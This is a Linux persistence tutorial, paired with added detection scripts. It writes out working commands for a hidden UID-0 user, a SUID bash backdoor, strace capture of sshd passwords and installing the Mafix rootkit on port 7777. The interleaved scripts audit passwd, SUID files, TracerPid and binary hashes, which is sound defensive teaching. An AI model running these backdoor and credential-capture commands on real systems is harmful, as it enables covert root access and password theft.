Linux Permission Maintenance Methodology
1. Create a super user
For example, create a root-equivalent user with username guest and password 123456:
useradd -p `openssl passwd -1 -salt 'salt' 123456` guest -o -u 0 -g root -G root -s /bin/bash -d /home/test
Here -u 0 gives the account UID 0, -o allows that UID to be duplicated (root already has it), and -p takes the password already hashed (openssl passwd -1 produces an MD5-crypt hash). The result is an account that is root in everything but name.
It is also possible to create a superuser by modifying /etc/passwd directly (the UID field, not the name, is what makes an account root):
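The following is an added example (not part of the original note) showing how a defender finds what the command above leaves behind: it scans a passwd file for every account whose UID is 0 but whose name is not root, and for accounts carrying a password hash inline instead of the "x" placeholder. The sample passwd content is constructed for the demo; the account names and hash in it are not from any real host.

```shell
#!/bin/sh
# Added example, not from the original note: audit a passwd file for
# UID-0 accounts other than root (left behind by "useradd -o -u 0") and
# for accounts whose password field holds a hash rather than "x".

# Print every account whose UID field (field 3) is 0 but whose name is not root.
find_extra_uid0() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# Print accounts whose password field is neither the "x" nor "*" placeholder,
# i.e. a hash (or an empty password) sits directly in passwd, not in shadow.
find_inline_passwords() {
    awk -F: '$2 != "x" && $2 != "*" { print $1 }' "$1"
}

# Write a constructed sample passwd file to path $1 (demo data only; the
# backdoor hash is a placeholder string, not a real MD5-crypt value).
write_sample_passwd() {
    cat > "$1" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
guest:x:0:0::/home/test:/bin/bash
alice:x:1000:1000:Alice:/home/alice:/bin/bash
backdoor:$1$salt$PLACEHOLDERHASH:0:0::/:/bin/sh
EOF
}

# Run both checks against the sample file and print a labelled report.
demo_uid0_scan() {
    f=$(mktemp)
    write_sample_passwd "$f"
    printf 'extra uid0 accounts: %s\n' "$(find_extra_uid0 "$f" | tr '\n' ' ')"
    printf 'inline password hashes: %s\n' "$(find_inline_passwords "$f" | tr '\n' ' ')"
    rm -f "$f"
}
```

On a live host run `find_extra_uid0 /etc/passwd`; any output other than an empty line deserves a look. The second check matters because /etc/passwd is world-readable and a hash written there can be brute-forced by any local user, which is why modern systems keep hashes in /etc/shadow.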
2. SUID backdoor for privilege maintenance
Conditions for a SUID backdoor:
- The SUID bit is only effective on binary programs (the Linux kernel ignores it on interpreted scripts)
- The executor must have execute permission on the program
- The elevated permission is only valid while the program is running
- While it runs, the executor has the privileges of the program's owner
Steps (performed as root, so the copied file is owned by root):
- Create a SUID file named .long by copying bash into it
cp /bin/bash .long    # copy the bash binary to the hidden file .long
chmod 4755 .long      # set the SUID bit: mode rwsr-xr-x, owner root
- Execute the SUID backdoor file
./.long -p
This yields a root shell. The -p flag is required: without it bash notices that the effective UID differs from the real UID and drops the elevated privilege before running. The file must also sit on a filesystem that is not mounted nosuid, and a root-owned SUID copy of bash with a hidden name is exactly what a routine `find / -perm -4000` sweep turns up.
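The following is an added example (not from the original note) of the sweep that catches a file like .long: it lists every SUID regular file under a directory and reports those absent from a baseline recorded on a clean host. The demo directory, the file names legit, .long and normal, and the baseline are all constructed for the example.

```shell
#!/bin/sh
# Added example, not from the original note: hunt for SUID files such as the
# .long copy of bash above, by diffing a live scan against a baseline list.

# Print all regular files under $1 with the SUID bit set, sorted.
# -perm -4000 matches the bit regardless of the other mode bits;
# -xdev keeps the scan on one filesystem (skip /proc, network mounts, etc).
find_suid() {
    find "$1" -xdev -type f -perm -4000 -print 2>/dev/null | sort
}

# Print SUID files under $1 that do not appear in baseline file $2
# (one absolute path per line, as produced by find_suid on a clean host).
new_suid() {
    find_suid "$1" | grep -vxF -f "$2"
}

# Demo on a constructed directory: one expected SUID file, one hidden SUID
# backdoor, one ordinary executable. Prints the backdoor's name.
demo_suid_scan() {
    d=$(mktemp -d)
    : > "$d/legit";  chmod 4755 "$d/legit"    # known SUID file, in the baseline
    : > "$d/.long";  chmod 4755 "$d/.long"    # hidden SUID file, the backdoor
    : > "$d/normal"; chmod 0755 "$d/normal"   # executable without SUID
    printf '%s\n' "$d/legit" > "$d/baseline.txt"
    new_suid "$d" "$d/baseline.txt" | sed "s#^$d/##"
    rm -rf "$d"
}
```

On a real host record the baseline with `find_suid / > suid.baseline` right after installation and keep it off the box; then `new_suid / suid.baseline` in a cron job reports anything added later. Because the backdoor is a byte-for-byte copy of /bin/bash, comparing hashes of the SUID files against the package manager's records is a useful second check.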
3. Strace monitoring backdoor
strace is a system-call tracer, but attached to the right process it can also be used to capture other users' passwords.
First find the PID of the sshd process:
ps -ef | grep sshd
Suppose the PID is 31171. Then start capturing:
strace -f -p 31171 -o .ssh.log -e trace=read,write,connect -s 2048
-f follows the child processes sshd forks for each connection, -e trace=read,write,connect limits the output to those system calls, and -s 2048 raises the string print limit so the buffers of each read and write are not truncated. From then on the password of anyone who logs in over ssh with password authentication, or who switches users with su inside a traced session, is recorded in the .ssh.log file. The disadvantage of this method is that the generated log file is very large and easily arouses suspicion. Attaching with ptrace also requires root (or CAP_SYS_PTRACE), and while the tracer is attached it is visible in the TracerPid field of /proc/<pid>/status of the traced process.
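The following is an added example (not from the original note) of the host-side check that exposes an attached strace: it reads the TracerPid field from /proc/<pid>/status and lists every traced process. The sample status file, with its PIDs 31171 and 4242, is constructed for the demo.

```shell
#!/bin/sh
# Added example, not from the original note: detect processes that are being
# traced, which is how an strace attached to sshd shows up on the host.

# Print the TracerPid field of a /proc/<pid>/status file; 0 means not traced.
tracer_pid() {
    awk '/^TracerPid:/ { print $2; exit }' "$1"
}

# Walk /proc and print "pid name tracerpid" for every traced process.
# Processes may exit mid-scan, so unreadable status files are skipped.
list_traced() {
    for s in /proc/[0-9]*/status; do
        [ -r "$s" ] || continue
        t=$(tracer_pid "$s")
        if [ "${t:-0}" -ne 0 ]; then
            p=${s#/proc/}; p=${p%/status}
            c=$(awk '/^Name:/ { print $2; exit }' "$s")
            printf '%s %s %s\n' "$p" "$c" "$t"
        fi
    done
}

# Write a constructed /proc/<pid>/status fragment to path $1: an sshd
# (pid 31171) stopped under a tracer with pid 4242. Demo data only.
write_sample_status() {
    cat > "$1" <<'EOF'
Name:   sshd
State:  t (tracing stop)
Tgid:   31171
Pid:    31171
PPid:   1
TracerPid:      4242
Uid:    0       0       0       0
EOF
}
```

Run `list_traced` periodically (or from the monitoring agent) and alert on any sshd, su or sudo with a non-zero TracerPid; a debugger legitimately attached by an administrator is rare enough on a production host that every hit is worth a ticket. The strace log itself is a second artifact: a hidden file growing by kilobytes per login.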
4. Rootkit backdoor
Mafix is a commonly used lightweight application-level rootkit. It provides remote login through a backdoored SSH service and, like other rootkits of this class, works by replacing system binaries rather than kernel code. It is characterised by simple configuration and a customisable authentication password and port number.
First download Mafix, upload it to the target server, unzip it, cd into the Mafix directory and install the rootkit:
./root 111111 7777
Here 111111 is the password used when connecting to the backdoor and 7777 is the port the backdoor listens on.
Connect to the backdoor:
ssh ip -p 7777
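The following is an added example (not from the original note) of the integrity check that catches an application-level rootkit: it records SHA-256 hashes of system binaries on a known-clean host and later reports the files whose hash has changed. The demo uses constructed stand-in files named ls and ps, not real binaries.

```shell
#!/bin/sh
# Added example, not from the original note: detect replaced system binaries,
# the footprint of an application-level rootkit, by comparing SHA-256 hashes
# against a baseline recorded on a known-clean host.

# Record hashes of the named files in directory $1; output goes to stdout.
# Store the result off the host, since a rootkit can edit a local baseline.
make_baseline() {
    dir=$1; shift
    (cd "$dir" && sha256sum "$@")
}

# Print the names of files in directory $1 whose hash no longer matches the
# baseline file $2 (an absolute path). sha256sum -c prints "name: FAILED"
# for each mismatch; the awk filter keeps only those names.
changed_files() {
    (cd "$1" && sha256sum -c "$2" 2>/dev/null) | awk -F': ' '$2 == "FAILED" { print $1 }'
}

# Demo on constructed stand-ins for ls and ps: record a baseline, then
# overwrite ps as a rootkit would, and report what changed.
demo_rootkit_check() {
    d=$(mktemp -d)
    printf 'clean ls\n' > "$d/ls"
    printf 'clean ps\n' > "$d/ps"
    make_baseline "$d" ls ps > "$d.baseline"
    printf 'trojaned ps\n' > "$d/ps"      # simulate the rootkit swapping ps
    changed_files "$d" "$d.baseline"
    rm -rf "$d" "$d.baseline"
}
```

On a packaged system `rpm -Va` or `debsums -c` performs the same comparison against the vendor's hashes. Either way the check must use tools that the rootkit has not replaced, so run it from a trusted copy of the binaries or from rescue media; the trojaned ps and netstat are precisely what would otherwise hide the listener on port 7777.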